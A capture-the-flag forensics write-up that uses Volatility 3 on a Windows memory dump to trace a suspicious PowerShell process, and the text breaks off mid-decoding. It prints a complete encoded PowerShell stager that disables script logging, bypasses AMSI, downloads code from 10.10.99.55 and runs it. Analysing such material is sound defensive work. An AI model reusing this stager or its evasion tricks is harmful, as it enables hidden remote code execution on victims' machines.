9 minutes
HTB Reminiscent - Writeup
Note: Before you begin, majority of this writeup uses volality3.0, so make sure you downloaded and have it setup on your system.
Setup
- First download the zip file and unzip the contents.
- We have a file
flounder-pc.memdump.elf
and another fileimageinfo.txt
.
imageinfo.txt
Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_23418
AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
AS Layer2 : VirtualBoxCoreDumpElf64 (Unnamed AS)
AS Layer3 : FileAddressSpace (/home/infosec/dumps/mem_dumps/01/flounder-pc-memdump.elf)
PAE type : No PAE
DTB : 0x187000L
KDBG : 0xf800027fe0a0L
Number of Processors : 2
Image Type (Service Pack) : 1
KPCR for CPU 0 : 0xfffff800027ffd00L
KPCR for CPU 1 : 0xfffff880009eb000L
KUSER_SHARED_DATA : 0xfffff78000000000L
Image date and time : 2017-10-04 18:07:30 UTC+0000
Image local date and time : 2017-10-04 11:07:30 -0700
This file gives us the suggested profiles that we may need while running volatility. Let’s choose the first profile: Win7SP1x64
Running volatility3
You can run commands which uses plugins like windows.info
to get to know more about your machine.
Getting list of processes using windows.pslist
- This plugin gives running processes on the machine at the time of the memory dump. Just like running
ps
on linux system.
$ /opt/volatility3/vol.py -f flounder-pc-memdump.elf windows.pslist
Volatility 3 Framework 1.0.0
Progress: 100.00 PDB scanning finished
PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime File output
4 0 System 0xfa80006b7040 83 477 N/A False 2017-10-04 18:04:27.000000 N/A Disabled
272 4 smss.exe 0xfa8001a63b30 2 30 N/A False 2017-10-04 18:04:27.000000 N/A Disabled
348 328 csrss.exe 0xfa800169bb30 9 416 0 False 2017-10-04 18:04:29.000000 N/A Disabled
376 328 wininit.exe 0xfa8001f63b30 3 77 0 False 2017-10-04 18:04:29.000000 N/A Disabled
396 384 csrss.exe 0xfa8001efa500 9 283 1 False 2017-10-04 18:04:29.000000 N/A Disabled
432 384 winlogon.exe 0xfa8001f966d0 4 112 1 False 2017-10-04 18:04:29.000000 N/A Disabled
476 376 services.exe 0xfa8001fcdb30 11 201 0 False 2017-10-04 18:04:29.000000 N/A Disabled
492 376 lsass.exe 0xfa8001ff2b30 8 590 0 False 2017-10-04 18:04:30.000000 N/A Disabled
500 376 lsm.exe 0xfa8001fffb30 11 150 0 False 2017-10-04 18:04:30.000000 N/A Disabled
600 476 svchost.exe 0xfa8002001b30 12 360 0 False 2017-10-04 18:04:30.000000 N/A Disabled
664 476 VBoxService.ex 0xfa800209bb30 12 118 0 False 2017-10-04 18:04:30.000000 N/A Disabled
728 476 svchost.exe 0xfa80020b5b30 7 270 0 False 2017-10-04 18:04:30.000000 N/A Disabled
792 476 svchost.exe 0xfa80021044a0 21 443 0 False 2017-10-04 18:04:30.000000 N/A Disabled
868 476 svchost.exe 0xfa8002166b30 21 429 0 False 2017-10-04 18:04:30.000000 N/A Disabled
900 476 svchost.exe 0xfa800217cb30 41 977 0 False 2017-10-04 18:04:30.000000 N/A Disabled
988 476 svchost.exe 0xfa80021ccb30 13 286 0 False 2017-10-04 18:04:30.000000 N/A Disabled
384 476 svchost.exe 0xfa8002204960 17 386 0 False 2017-10-04 18:04:30.000000 N/A Disabled
1052 476 spoolsv.exe 0xfa8002294b30 13 277 0 False 2017-10-04 18:04:31.000000 N/A Disabled
1092 476 svchost.exe 0xfa80022bbb30 19 321 0 False 2017-10-04 18:04:31.000000 N/A Disabled
1196 476 svchost.exe 0xfa8002390620 28 333 0 False 2017-10-04 18:04:31.000000 N/A Disabled
1720 476 taskhost.exe 0xfa8002245060 8 148 1 False 2017-10-04 18:04:36.000000 N/A Disabled
1840 476 sppsvc.exe 0xfa8002122060 4 145 0 False 2017-10-04 18:04:37.000000 N/A Disabled
2020 868 dwm.exe 0xfa80022c8060 4 72 1 False 2017-10-04 18:04:41.000000 N/A Disabled
2044 2012 explorer.exe 0xfa80020bb630 36 926 1 False 2017-10-04 18:04:41.000000 N/A Disabled
1476 2044 VBoxTray.exe 0xfa80022622e0 13 146 1 False 2017-10-04 18:04:42.000000 N/A Disabled
1704 476 SearchIndexer. 0xfa80021b4060 16 734 0 False 2017-10-04 18:04:47.000000 N/A Disabled
812 1704 SearchFilterHo 0xfa80023ed550 4 92 0 False 2017-10-04 18:04:48.000000 N/A Disabled
1960 1704 SearchProtocol 0xfa80024f4b30 6 311 0 False 2017-10-04 18:04:48.000000 N/A Disabled
2812 2044 thunderbird.ex 0xfa80007e0b30 50 534 1 True 2017-10-04 18:06:24.000000 N/A Disabled
2924 600 WmiPrvSE.exe 0xfa8000801b30 10 204 0 False 2017-10-04 18:06:26.000000 N/A Disabled
2120 476 svchost.exe 0xfa8000945060 12 335 0 False 2017-10-04 18:06:32.000000 N/A Disabled
2248 476 wmpnetwk.exe 0xfa800096eb30 18 489 0 False 2017-10-04 18:06:33.000000 N/A Disabled
592 600 WmiPrvSE.exe 0xfa8000930b30 9 127 0 False 2017-10-04 18:06:35.000000 N/A Disabled
496 2044 powershell.exe 0xfa800224e060 12 300 1 False 2017-10-04 18:06:58.000000 N/A Disabled
2772 396 conhost.exe 0xfa8000e90060 2 55 1 False 2017-10-04 18:06:58.000000 N/A Disabled
2752 496 powershell.exe 0xfa8000839060 20 396 1 False 2017-10-04 18:07:00.000000 N/A Disabled
This wasn’t that helpful. One key-takeaway could be that powershell.exe
is running. Let’s note the PID: 2752.
Getting live connections using windows.netscan
- This plugin gives us the connections at the time of the memory dump. Just like running
netstat
command.
$ /opt/volatility3/vol.py -f flounder-pc-memdump.elf windows.netscan
Volatility 3 Framework 1.0.0
Progress: 100.00 PDB scanning finished
Offset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner Created
0x1e069840 UDPv4 10.10.100.43 137 * 0 4 System 2017-10-04 18:04:31.000000
0x1e06a950 TCPv4 10.10.100.43 139 0.0.0.0 0 LISTENING 4 System -
0x1e078670 TCPv4 0.0.0.0 5357 0.0.0.0 0 LISTENING 4 System -
0x1e078670 TCPv6 :: 5357 :: 0 LISTENING 4 System -
0x1e0a8ec0 UDPv4 0.0.0.0 60655 * 0 1196 svchost.exe 2017-10-04 18:04:31.000000
0x1e0a8ec0 UDPv6 :: 60655 * 0 1196 svchost.exe 2017-10-04 18:04:31.000000
0x1e0ac8a0 TCPv4 0.0.0.0 49155 0.0.0.0 0 LISTENING 476 services.exe -
0x1e0b0a50 UDPv4 0.0.0.0 60654 * 0 1196 svchost.exe 2017-10-04 18:04:31.000000
0x1e0e08a0 TCPv4 0.0.0.0 445 0.0.0.0 0 LISTENING 4 System -
0x1e0e08a0 TCPv6 :: 445 :: 0 LISTENING 4 System -
0x1e0f9010 UDPv4 0.0.0.0 5004 * 0 2248 wmpnetwk.exe 2017-10-04 18:06:34.000000
0x1e243b20 TCPv4 0.0.0.0 49154 0.0.0.0 0 LISTENING 900 svchost.exe -
0x1e27f980 TCPv4 0.0.0.0 49154 0.0.0.0 0 LISTENING 900 svchost.exe -
0x1e27f980 TCPv6 :: 49154 :: 0 LISTENING 900 svchost.exe -
0x1e28f1a0 UDPv4 0.0.0.0 5005 * 0 2248 wmpnetwk.exe 2017-10-04 18:06:34.000000
0x1e28f1a0 UDPv6 :: 5005 * 0 2248 wmpnetwk.exe 2017-10-04 18:06:34.000000
0x1e2ec510 TCPv6 - 0 382b:ff01:80fa:ffff:a010:4502:80fa:ffff 0 CLOSED 384 svchost.exe N/A
0x1e2f33f0 TCPv4 0.0.0.0 49157 0.0.0.0 0 LISTENING 492 lsass.exe -
0x1e2fc460 UDPv4 127.0.0.1 54573 * 0 1196 svchost.exe 2017-10-04 18:06:34.000000
0x1e391b30 TCPv4 0.0.0.0 49155 0.0.0.0 0 LISTENING 476 services.exe -
0x1e391b30 TCPv6 :: 49155 :: 0 LISTENING 476 services.exe -
0x1e3c5da0 UDPv4 0.0.0.0 5005 * 0 2248 wmpnetwk.exe 2017-10-04 18:06:34.000000
0x1e3f7010 UDPv4 0.0.0.0 5355 * 0 384 svchost.exe 2017-10-04 18:04:35.000000
0x1e3f7010 UDPv6 :: 5355 * 0 384 svchost.exe 2017-10-04 18:04:35.000000
0x1e3fb010 UDPv4 0.0.0.0 0 * 0 384 svchost.exe 2017-10-04 18:04:33.000000
0x1e3fb010 UDPv6 :: 0 * 0 384 svchost.exe 2017-10-04 18:04:33.000000
0x1e47a730 TCPv6 - 0 6890:8300:80fa:ffff:6890:8300:80fa:ffff 0 CLOSED 2752 powershell.exe -
0x1e4c1e60 TCPv4 0.0.0.0 135 0.0.0.0 0 LISTENING 728 svchost.exe -
0x1e4c30a0 TCPv4 0.0.0.0 135 0.0.0.0 0 LISTENING 728 svchost.exe -
0x1e4c30a0 TCPv6 :: 135 :: 0 LISTENING 728 svchost.exe -
0x1e4d7e70 TCPv4 0.0.0.0 49152 0.0.0.0 0 LISTENING 376 wininit.exe -
0x1e4d7e70 TCPv6 :: 49152 :: 0 LISTENING 376 wininit.exe -
0x1e517800 TCPv6 - 0 38cb:1702:80fa:ffff:38cb:1702:80fa:ffff 0 CLOSED 2248 wmpnetwk.exe N/A
0x1e556820 TCPv4 0.0.0.0 49153 0.0.0.0 0 LISTENING 792 svchost.exe -
0x1e556820 TCPv6 :: 49153 :: 0 LISTENING 792 svchost.exe -
0x1e5689e0 TCPv4 0.0.0.0 49153 0.0.0.0 0 LISTENING 792 svchost.exe -
0x1e5a3250 UDPv4 0.0.0.0 5355 * 0 384 svchost.exe 2017-10-04 18:04:35.000000
0x1e5cdef0 TCPv4 0.0.0.0 49157 0.0.0.0 0 LISTENING 492 lsass.exe -
0x1e5cdef0 TCPv6 :: 49157 :: 0 LISTENING 492 lsass.exe -
0x1e5fa480 UDPv4 127.0.0.1 1900 * 0 1196 svchost.exe 2017-10-04 18:06:34.000000
0x1e774a60 UDPv4 10.10.100.43 138 * 0 4 System 2017-10-04 18:04:31.000000
0x1e7d7a60 TCPv6 - 0 6890:8300:80fa:ffff:6890:8300:80fa:ffff 0 CLOSED 2752 powershell.exe N/A
0x1e85e010 UDPv6 ::1 1900 * 0 1196 svchost.exe 2017-10-04 18:06:34.000000
0x1e8fb010 UDPv4 0.0.0.0 5004 * 0 2248 wmpnetwk.exe 2017-10-04 18:06:34.000000
0x1e8fb010 UDPv6 :: 5004 * 0 2248 wmpnetwk.exe 2017-10-04 18:06:34.000000
0x1e8ff010 UDPv4 10.10.100.43 1900 * 0 1196 svchost.exe 2017-10-04 18:06:34.000000
0x1e903b10 UDPv6 ::1 54572 * 0 1196 svchost.exe 2017-10-04 18:06:34.000000
0x1e909010 UDPv4 0.0.0.0 0 * 0 2752 powershell.exe 2017-10-04 18:07:01.000000
0x1ec304b0 UDPv4 0.0.0.0 3702 * 0 1196 svchost.exe 2017-10-04 18:04:34.000000
0x1ed592b0 UDPv4 0.0.0.0 3702 * 0 1196 svchost.exe 2017-10-04 18:04:34.000000
0x1ee7cd20 TCPv4 0.0.0.0 49152 0.0.0.0 0 LISTENING 376 wininit.exe -
0x1eec14e0 UDPv4 0.0.0.0 3702 * 0 1196 svchost.exe 2017-10-04 18:04:34.000000
0x1eec14e0 UDPv6 :: 3702 * 0 1196 svchost.exe 2017-10-04 18:04:34.000000
0x1f1ea4f0 UDPv4 0.0.0.0 3702 * 0 1196 svchost.exe 2017-10-04 18:04:34.000000
0x1f1ea4f0 UDPv6 :: 3702 * 0 1196 svchost.exe 2017-10-04 18:04:34.000000
0x1f6c1010 UDPv4 0.0.0.0 0 * 0 2752 powershell.exe 2017-10-04 18:07:01.000000
0x1f6c1010 UDPv6 :: 0 * 0 2752 powershell.exe 2017-10-04 18:07:01.000000
0x1f6c2ec0 UDPv4 0.0.0.0 0 * 0 2752 powershell.exe 2017-10-04 18:07:01.000000
0x1fc04010 TCPv6 - 0 6890:8300:80fa:ffff:6890:8300:80fa:ffff 0 CLOSED 2752 powershell.exe N/A
0x1fc04490 TCPv4 10.10.100.43 49246 10.10.99.55 80 CLOSED 2752 powershell.exe -
0x1fc15010 TCPv6 ::1 2869 ::1 49237 ESTABLISHED 4 System N/A
0x1fc3d320 TCPv4 10.10.100.43 49247 10.10.99.55 80 CLOSED 2752 powershell.exe -
0x1fc769d0 TCPv4 127.0.0.1 49232 127.0.0.1 49231 ESTABLISHED 2812 thunderbird.ex N/A
0x1fc76cf0 TCPv4 127.0.0.1 49231 127.0.0.1 49232 ESTABLISHED 2812 thunderbird.ex N/A
0x1fc85010 UDPv6 fe80::6cee:b5c1:4a75:f04b 1900 * 0 1196 svchost.exe 2017-10-04 18:06:34.000000
0x1fc8e680 UDPv4 0.0.0.0 0 * 0 2752 powershell.exe 2017-10-04 18:07:01.000000
0x1fc8e680 UDPv6 :: 0 * 0 2752 powershell.exe 2017-10-04 18:07:01.000000
0x1fc99db0 TCPv4 0.0.0.0 554 0.0.0.0 0 LISTENING 2248 wmpnetwk.exe -
0x1fcc2b80 TCPv4 0.0.0.0 2869 0.0.0.0 0 LISTENING 4 System -
0x1fcc2b80 TCPv6 :: 2869 :: 0 LISTENING 4 System -
0x1fcc8010 TCPv6 ::1 49237 ::1 2869 ESTABLISHED 2248 wmpnetwk.exe N/A
0x1fcdbec0 UDPv4 0.0.0.0 0 * 0 664 VBoxService.ex 2017-10-04 18:06:56.000000
0x1fcf4940 TCPv4 10.10.100.43 49233 10.10.20.166 143 ESTABLISHED 2812 thunderbird.ex N/A
0x1fd01780 TCPv4 0.0.0.0 10243 0.0.0.0 0 LISTENING 4 System -
0x1fd01780 TCPv6 :: 10243 :: 0 LISTENING 4 System -
0x1fd9a3e0 TCPv4 0.0.0.0 554 0.0.0.0 0 LISTENING 2248 wmpnetwk.exe -
0x1fd9a3e0 TCPv6 :: 554 :: 0 LISTENING 2248 wmpnetwk.exe -
0x1fdb3630 TCPv4 10.10.100.43 49236 10.10.20.166 143 ESTABLISHED 2812 thunderbird.ex N/A
What stood out to me was these line:
0x1fc04490 TCPv4 10.10.100.43 49246 10.10.99.55 80 CLOSED 2752 powershell.exe -
0x1fc3d320 TCPv4 10.10.100.43 49247 10.10.99.55 80 CLOSED 2752 powershell.exe -
Even though these connections were closed, there are some alarming signs:
- That there is
powershell.exe
, even though it might be benign, it is possible that this might be used for setting up reverse shell. - That there is communication with port “80” using
powershell.exe
. This stoods out because a normal user (who is not that techsavvy) won’t use “powershell.exe” to communicate with a website.
Let’s dump out the command that would’ve been used to call powershell.exe
to investigate.
Getting command run by using windows.cmdline
- We can get all the commands that were used to run the process using the command:
$ /opt/volatility3/vol.py -f flounder-pc-memdump.elf windows.cmdline
- But to only get the command of a particular process, we can use PID with
--pid
flag
$ /opt/volatility3/vol.py -f flounder-pc-memdump.elf windows.cmdline --pid 2752 2 ⨯
Volatility 3 Framework 1.0.0
Progress: 100.00 PDB scanning finished
PID Process Args
2752 powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc JABHAHIAbwBVAFAAUABPAEwAaQBDAFkAUwBFAHQAdABJAE4ARwBzACAAPQAgAFsAcgBFAEYAXQAuAEEAUwBzAGUATQBCAEwAWQAuAEcARQB0AFQAeQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAEkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAgACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBHAEUAVABWAGEAbABVAGUAKAAkAG4AdQBsAEwAKQA7ACQARwBSAG8AdQBQAFAATwBsAEkAQwB5AFMAZQBUAFQAaQBOAGcAUwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AIAA9ACAAMAA7ACQARwBSAG8AdQBQAFAATwBMAEkAQwBZAFMARQB0AFQAaQBuAGcAUwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQAgAD0AIAAwADsAWwBSAGUAZgBdAC4AQQBzAFMAZQBtAEIAbAB5AC4ARwBlAFQAVAB5AFAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAEUAdABGAGkAZQBMAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQBUAFYAYQBMAHUARQAoACQATgB1AGwATAAsACQAVAByAHUAZQApAH0AOwBbAFMAeQBzAFQAZQBtAC4ATgBlAFQALgBTAEUAcgBWAEkAYwBlAFAATwBJAG4AdABNAEEAbgBBAGcARQBSAF0AOgA6AEUAeABwAEUAYwB0ADEAMAAwAEMATwBuAFQAaQBuAHUARQA9ADAAOwAkAFcAQwA9AE4ARQBXAC0ATwBCAGoARQBjAFQAIABTAHkAcwBUAEUATQAuAE4ARQB0AC4AVwBlAEIAQwBsAEkARQBuAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJAB3AEMALgBIAGUAYQBEAGUAcgBTAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJABXAGMALgBQAFIAbwBYAHkAPQBbAFMAeQBzAFQAZQBNAC4ATgBFAFQALgBXAGUAYgBSAGUAcQB1AEUAcwB0AF0AOgA6AEQAZQBmAGEAVQBMAHQAVwBlAEIAUABSAE8AWABZADsAJAB3AEMALgBQAFIAbwBYAFkALgBDAFIARQBEAGUATgB0AEkAYQBMAFMAIAA9ACAAWwBTAFkAUwBUAGUATQAuAE4ARQBUAC4AQwByAGUARABFAG4AVABpAGEATABDAGEAQwBoAGUAXQA6ADoARABlAEYAYQB1AEwAVABOAEUAdAB3AE8AcgBrAEMAcgBlAGQAZQBuAHQAaQBBAGwAUwA7ACQASwA9AFsAUwBZAFMAdABFAE0ALgBUAGUAeAB0AC4ARQBOAEMATwBEAEkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcARQB0AEIAeQB0AEUAcwAoACcARQAxAGcATQBHAGQAZgBUAEAAZQBvAE4APgB4ADkAewBdADIARgA3ACsAYgBzAE8AbgA0AC8AUwBpAFEAcgB3ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIAZwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAHUAbgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAdwBjAC4ASABFAEEAZABFAHIAcwAuAEEARABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0ATQBDAGEAaAB1AFEAVgBmAHoAMAB5AE0ANgBWAEIAZQA4AGYAegBWADkAdAA5AGoAbwBtAG8APQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADkAOQAuADUANQA6ADgAMAAnADsAJAB0AD0AJwAvAGwAbwBnAGkAbgAvAHAAcgBvAGMAZQBzAHMALgBwAGgAcAAnADsAJABmAGwAYQBnAD0AJwBIAFQAQgB7ACQAXwBqADAARwBfAHkAMAB1AFIAXwBNADMAbQAwAHIAWQBfACQAfQAnADsAJABEAGEAdABBAD0AJABXAEMALgBEAG8AVwBOAEwAbwBhAEQARABBAFQAQQAoACQAUwBlAFIAKwAkAHQAKQA7ACQAaQB2AD0AJABkAGEAVABBAFsAMAAuAC4AMwBdADsAJABEAEEAdABhAD0AJABEAGEAVABhAFsANAAuAC4AJABEAEEAdABhAC4ATABlAG4ARwBUAEgAXQA7AC0ASgBPAEkATgBbAEMASABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=
So powershell.exe
is called with -enc
command which uses base64 encoding.
On decoding this encoding:
$ echo -n JABHAHIAbwBVAFAAUABPAEwAaQBDAFkAUwBFAHQAdABJAE4ARwBzACAAPQAgAFsAcgBFAEYAXQAuAEEAUwBzAGUATQBCAEwAWQAuAEcARQB0AFQAeQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAEkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAgACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBHAEUAVABWAGEAbABVAGUAKAAkAG4AdQBsAEwAKQA7ACQARwBSAG8AdQBQAFAATwBsAEkAQwB5AFMAZQBUAFQAaQBOAGcAUwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AIAA9ACAAMAA7ACQARwBSAG8AdQBQAFAATwBMAEkAQwBZAFMARQB0AFQAaQBuAGcAUwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQAgAD0AIAAwADsAWwBSAGUAZgBdAC4AQQBzAFMAZQBtAEIAbAB5AC4ARwBlAFQAVAB5AFAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAEUAdABGAGkAZQBMAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQBUAFYAYQBMAHUARQAoACQATgB1AGwATAAsACQAVAByAHUAZQApAH0AOwBbAFMAeQBzAFQAZQBtAC4ATgBlAFQALgBTAEUAcgBWAEkAYwBlAFAATwBJAG4AdABNAEEAbgBBAGcARQBSAF0AOgA6AEUAeABwAEUAYwB0ADEAMAAwAEMATwBuAFQAaQBuAHUARQA9ADAAOwAkAFcAQwA9AE4ARQBXAC0ATwBCAGoARQBjAFQAIABTAHkAcwBUAEUATQAuAE4ARQB0AC4AVwBlAEIAQwBsAEkARQBuAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJAB3AEMALgBIAGUAYQBEAGUAcgBTAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJABXAGMALgBQAFIAbwBYAHkAPQBbAFMAeQBzAFQAZQBNAC4ATgBFAFQALgBXAGUAYgBSAGUAcQB1AEUAcwB0AF0AOgA6AEQAZQBmAGEAVQBMAHQAVwBlAEIAUABSAE8AWABZADsAJAB3AEMALgBQAFIAbwBYAFkALgBDAFIARQBEAGUATgB0AEkAYQBMAFMAIAA9ACAAWwBTAFkAUwBUAGUATQAuAE4ARQBUAC4AQwByAGUARABFAG4AVABpAGEATABDAGEAQwBoAGUAXQA6ADoARABlAEYAYQB1AEwAVABOAEUAdAB3AE8AcgBrAEMAcgBlAGQAZQBuAHQAaQBBAGwAUwA7ACQASwA9AFsAUwBZAFMAdABFAE0ALgBUAGUAeAB0AC4ARQBOAEMATwBEAEkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcARQB0AEIAeQB0AEUAcwAoACcARQAxAGcATQBHAGQAZgBUAEAAZQBvAE4APgB4ADkAewBdADIARgA3ACsAYgBzAE8AbgA0AC8AUwBpAFEAcgB3ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIAZwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAHUAbgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAdwBjAC4ASABFAEEAZABFAHIAcwAuAEEARABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0ATQBDAGEAaAB1AFEAVgBmAHoAMAB5AE0ANgBWAEIAZQA4AGYAegBWADkAdAA5AGoAbwBtAG8APQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADkAOQAuADUANQA6ADgAMAAnADsAJAB0AD0AJwAvAGwAbwBnAGkAbgAvAHAAcgBvAGMAZQBzAHMALgBwAGgAcAAnADsAJABmAGwAYQBnAD0AJwBIAFQAQgB7ACQAXwBqADAARwBfAHkAMAB1AFIAXwBNADMAbQAwAHIAWQBfACQAfQAnADsAJABEAGEAdABBAD0AJABXAEMALgBEAG8AVwBOAEwAbwBhAEQARABBAFQAQQAoACQAUwBlAFIAKwAkAHQAKQA7ACQAaQB2AD0AJABkAGEAVABBAFsAMAAuAC4AMwBdADsAJABEAEEAdABhAD0AJABEAGEAVABhAFsANAAuAC4AJABEAEEAdABhAC4ATABlAG4ARwBUAEgAXQA7AC0ASgBPAEkATgBbAEMASABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA= |base64 -d
$GroUPPOLiCYSEttINGs = [rEF].ASseMBLY.GEtTypE('System.Management.Automation.Utils')."GEtFIE`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static').GETValUe($nulL);$GRouPPOlICySeTTiNgS['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;$GRouPPOLICYSEtTingS['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;[Ref].AsSemBly.GeTTyPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GEtFieLd('amsiInitFailed','NonPublic,Static').SETVaLuE($NulL,$True)};[SysTem.NeT.SErVIcePOIntMAnAgER]::ExpEct100COnTinuE=0;$WC=NEW-OBjEcT SysTEM.NEt.WeBClIEnt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wC.HeaDerS.Add('User-Agent',$u);$Wc.PRoXy=[SysTeM.NET.WebRequEst]::DefaULtWeBPROXY;$wC.PRoXY.CREDeNtIaLS = 